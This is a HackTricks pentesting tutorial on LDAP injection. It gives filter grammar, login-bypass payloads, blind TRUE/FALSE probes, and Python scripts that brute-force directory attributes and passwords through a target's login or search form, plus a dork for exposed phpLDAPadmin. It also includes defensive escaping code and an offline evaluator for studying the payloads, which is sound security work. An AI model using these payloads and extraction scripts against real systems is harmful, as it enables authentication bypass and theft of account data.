hacktricks/pentesting-web/ldap-injection.md

# LDAP Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\

**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

## LDAP Injection

### **LDAP**

**If you want to know what LDAP is, check the following page:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**LDAP injection** is an attack against web applications that build LDAP statements from user input. It occurs when the application **does not properly sanitise that input**, so an attacker can **manipulate the LDAP statements** by crafting the input (typically through an intercepting proxy), which can lead to unauthorised access or to reading and modifying directory data.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}
**Filter** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolute TRUE\
**(|)** = Absolute FALSE

For example:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Through the injection you reach the directory behind the application, which can hold information of many different types, not only the objects the application itself queries.

**OpenLDAP**: if two filters arrive, only the first one is executed.\
**ADAM or Microsoft LDS**: with two filters an error is returned.\
**SunOne Directory Server 5.0**: executes both filters.

**It is very important to send the filter with correct syntax, otherwise an error is raised. It is better to send only one filter.**

The filter must begin with `&` or `|`\
Example: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Then `(&(objectClass=`**`*)(ObjectClass=*))`** becomes the first filter (the one that is executed); the remainder, `(&(objectClass=void)(type=Epson*))`, is ignored by OpenLDAP and rejected by a strict server.


### Login Bypass

LDAP stores passwords in several formats (clear text, or hashed with schemes such as `{MD5}`, `{SMD5}`, `{SHA}`, `{SSHA}` or `{CRYPT}`), so whatever you submit as the password may be hashed before it is compared, and a filter on the password attribute is evaluated against the stored value, not against the plaintext you typed.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```
```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```
```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```
```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```
```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```
```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can throw an error on strict servers (ADAM/LDS); OpenLDAP executes only (&(user=admin)(&))
```
```bash
username = admin)(!(&(|
pass = any))
--> (&(uid=admin)(!(&(|)(webpassword=any)))) # (|) is always FALSE, so the inner (&...) is FALSE and the (!...) is TRUE: only (uid=admin) has to hold and the password check is bypassed
```
```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```
```bash
username=admin))(|(|
password=any
--> (&(uid=admin))(|(|)(webpassword=any)) # The first complete filter is (&(uid=admin)); OpenLDAP executes it and ignores the rest
```

#### Lists

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [LDAP attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Blind LDAP Injection

You can force FALSE or TRUE responses to check whether any data is returned and confirm a possible blind LDAP injection:
```bash
#This evaluates to TRUE, so some information is returned
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass=*)(objectClass=*))(&objectClass=void)(type=Pepi*))
```
```bash
#This evaluates to FALSE, so nothing is returned
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass=void)(objectClass=void))(&objectClass=void)(type=Pepi*))
```
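The grammar above, the login-bypass payloads and the TRUE/FALSE probes can be replayed offline with the parser and evaluator below. This is an added example, not HackTricks code and not the behaviour of any particular server: the directory entries, the `login_filter` and `probe_filter` constructions and the attribute values are made up, and the evaluator simplifies real matching rules (every attribute is compared case-insensitively and `\XX` escapes are not decoded). It models OpenLDAP's habit of evaluating only the first complete filter and a strict server's rejection of trailing data; the probes are written without the spaces the page uses for readability, because spaces inside a value are significant.

```python
#!/usr/bin/env python3
"""Added example: a tiny RFC 4515 filter parser/evaluator to replay this page's
payloads against a constructed in-memory directory (not HackTricks code)."""
import re

def parse_filter(s, pos=0):
    """Parse one parenthesised filter starting at s[pos]; return (node, index after ')')."""
    if pos >= len(s) or s[pos] != "(":
        raise ValueError(f"expected '(' at offset {pos}")
    pos += 1
    if pos >= len(s):
        raise ValueError("truncated filter")
    c = s[pos]
    if c in "&|":                      # filterlist: zero or more children
        kids, pos = [], pos + 1
        while pos < len(s) and s[pos] == "(":
            kid, pos = parse_filter(s, pos)
            kids.append(kid)
        node = (c, kids)               # (&) is always TRUE, (|) is always FALSE
    elif c == "!":
        kid, pos = parse_filter(s, pos + 1)
        node = ("!", [kid])
    else:                              # simple / present / substring item
        end = s.find(")", pos)
        if end < 0:
            raise ValueError("unterminated item")
        attr, sep, value = s[pos:end].partition("=")
        if not sep:
            raise ValueError(f"no '=' in item {s[pos:end]!r}")
        node = ("item", (attr.strip().lower(), value))
        pos = end
    if pos >= len(s) or s[pos] != ")":
        raise ValueError(f"expected ')' at offset {pos}")
    return node, pos + 1

def first_filter(s):
    """OpenLDAP behaviour from the page: use the first complete filter, ignore the tail."""
    node, end = parse_filter(s)
    return node, s[end:]

def strict_rejects(s):
    """ADAM / AD LDS behaviour from the page: anything after the first filter is an error."""
    _node, end = parse_filter(s)
    return end != len(s)

def matches(node, entry):
    """Evaluate a parsed filter against one entry (dict of lower-cased attr -> list of values).
    Simplification: every attribute is compared case-insensitively, escapes are not decoded."""
    kind, payload = node
    if kind == "&":
        return all(matches(k, entry) for k in payload)
    if kind == "|":
        return any(matches(k, entry) for k in payload)
    if kind == "!":
        return not matches(payload[0], entry)
    attr, value = payload
    values = entry.get(attr, [])
    if value == "*":                   # present
        return bool(values)
    if "*" in value:                   # substring: initial*any*final
        pattern = ".*".join(re.escape(part) for part in value.split("*"))
        return any(re.fullmatch(pattern, v, re.IGNORECASE) for v in values)
    return any(v.lower() == value.lower() for v in values)   # equality

# Constructed sample directory; keys are lower-cased attribute names.
DIRECTORY = [
    {"uid": ["admin"], "userpassword": ["Sup3rSecret"], "objectclass": ["person"]},
    {"uid": ["bob"], "userpassword": ["bobpass"], "objectclass": ["person"]},
    {"uid": ["svc"], "objectclass": ["person"]},          # no password attribute
]

def search(filter_string):
    """Return the uids matched by the first filter in filter_string."""
    node, _tail = first_filter(filter_string)
    return [e["uid"][0] for e in DIRECTORY if matches(node, e)]

def login_filter(user, password):
    """The vulnerable construction this page attacks: raw input concatenated into the filter."""
    return f"(&(uid={user})(userPassword={password}))"

def login(user, password):
    return search(login_filter(user, password))

def probe_filter(value):
    """Blind-injection target used by the page: (&(objectClass=<input>)(type=Pepi*))."""
    return f"(&(objectClass={value})(type=Pepi*))"

if __name__ == "__main__":
    for u, p in [("*", "*"), ("*)(&", "*)(&"), ("*)(|(userPassword=*", "test)"),
                 ("admin)(&)", "wrong"), ("admin)(!(&(|", "any))")]:
        print(f"{login_filter(u, p):50} -> {login(u, p)}")
    true_probe = probe_filter("*)(objectClass=*))(&objectClass=void")
    _node, tail = first_filter(true_probe)
    print("TRUE probe  ->", search(true_probe), "ignored tail:", tail)
    print("FALSE probe ->", search(probe_filter("void)(objectClass=void))(&objectClass=void")))
```

Running it shows every bypass payload from the list above returning the admin entry (or every entry with a password), the `admin)(&)` payload leaving `(userPassword=wrong))` as an unparsed tail that `strict_rejects` flags, and the two blind probes returning all entries and none respectively.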

#### Dumping data

You can iterate over ASCII letters, digits and symbols. This only works for attributes whose schema defines a substring matching rule: OpenLDAP's `userPassword` (Octet String syntax, equality match only) has none, so `(userPassword=M*)` evaluates to Undefined and never matches, and where it does work you recover the stored value, which may be a hash rather than the plaintext:
```bash
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
```

### Scripts

#### **Discover valid LDAP fields**

LDAP objects **contain several attributes by default** that can be used to **store information**. You can try to **brute-force all of them to extract that information.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = {"http": "localhost:8080"}
url = "http://10.10.10.10/login.php"
# Candidate characters. Note that ( ) * and \ break the filter when sent raw and would
# have to be sent RFC 4515-escaped (\28 \29 \2a \5c) to be tested as literal values.
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword"]

for attribute in attributes:  # Extract the value of every attribute
    value = ""
    finish = False
    while not finish:
        for char in alphabet:  # At each position test every candidate char
            query = f"*)({attribute}={value}{char}*"  # The application closes the filter
            data = {'login': query, 'password': 'bla'}
            r = requests.post(url, data=data, proxies=proxy)
            sys.stdout.write(f"\r{attribute}: {value}{char}")
            #sleep(0.5) #Avoid brute-force bans
            if "Cannot login" in r.text:  # TRUE condition: the filter matched an entry, so the prefix is right
                value += str(char)
                break
            if char == alphabet[-1]:  # No char matched at this position: the value is complete
                finish = True
    print()
```
#### **Special blind LDAP injection (without "\*")**

This variant is for applications that strip or block the `*` in your input, or that complete the filter themselves so you cannot append a trailing wildcard. The script below, written against a `ctf.web` target, injects through a `search` parameter and extends the `password` value one character per request, using a marker string in the response ("TRUE CONDITION", to be replaced with whatever the application shows when the filter matches) as the oracle. It assumes the application closes the injected assertion with its own wildcard, for example by appending `*)` to the search value; if the server receives a bare `(password=MA)` that is an exact match and the character-by-character walk never succeeds.

To prevent this class of bug the application must escape every filter metacharacter in user input as RFC 4515 requires (`\` as `\5c`, `*` as `\2a`, `(` as `\28`, `)` as `\29`, NUL as `\00`) or build filters with a library that does so, and validate identifiers such as usernames against an allow-list instead of stripping individual characters.
```python
#!/usr/bin/python3
import requests, string

alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):  # Upper bound on the length of the value being recovered
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        # Inject the known prefix plus one candidate character; no trailing * is sent
        # because the application is expected to append the rest of the filter itself
        r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):  # Replace with the response marker of a matching filter
            flag += char
            print("[+] Flag: " + flag)
            break
```
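The escaping that the prevention note above calls for, shown beside the vulnerable concatenation, as an added example rather than HackTricks code. The attribute names `uid` and `userPassword` and the `login_filter_*` builders are assumptions for illustration; the escaping itself follows RFC 4515, and real projects can use `ldap.filter.escape_filter_chars` (python-ldap) or `ldap3.utils.conv.escape_filter_chars` (ldap3) instead of hand-rolling it.

```python
#!/usr/bin/env python3
"""Added example (not HackTricks code): RFC 4515 escaping of filter values, shown
next to the vulnerable concatenation this page attacks. Attribute names are made up."""
import re

def escape_filter_value(value: str) -> str:
    """Escape a string for use as an assertionvalue in an LDAP search filter.
    RFC 4515 requires '\\', '*', '(', ')' and NUL to be encoded as \\XX; other
    control and non-ASCII characters are encoded per UTF-8 byte the same way so
    the filter stays printable ASCII and no byte can be read as syntax."""
    out = []
    for ch in value:
        if ch in "\\*()" or ord(ch) < 0x20 or ord(ch) > 0x7e:
            out.append("".join(f"\\{b:02x}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)

def login_filter_vulnerable(user: str, password: str) -> str:
    """Raw concatenation: user-controlled metacharacters become filter syntax."""
    return f"(&(uid={user})(userPassword={password}))"

def login_filter_safe(user: str, password: str) -> str:
    """Same filter with every value escaped: '*', '(' and ')' are now literal bytes."""
    return f"(&(uid={escape_filter_value(user)})(userPassword={escape_filter_value(password)}))"

USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")

def is_plain_username(user: str) -> bool:
    """Allow-list check for identifiers: accept only a short alphanumeric name."""
    return USERNAME_RE.fullmatch(user) is not None

if __name__ == "__main__":
    for user, password in [("admin", "hunter2"), ("*", "*"),
                           ("admin)(&)", "x"), ("*)(|(userPassword=*", "test)")]:
        print("input:     ", repr(user), repr(password))
        print("vulnerable:", login_filter_vulnerable(user, password))
        print("safe:      ", login_filter_safe(user, password))
        print("allow-list:", is_plain_username(user))
```

Note that this is filter escaping only: values placed into a DN (for example when building `uid=<user>,ou=people,dc=example,dc=com` for a bind) follow the different RFC 4514 rules, and reusing the filter escaper there is a common mistake.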

### Google Dorks

A dork for locating exposed phpLDAPadmin instances, which expose a directory through a web frontend:
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```

### More Payloads

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}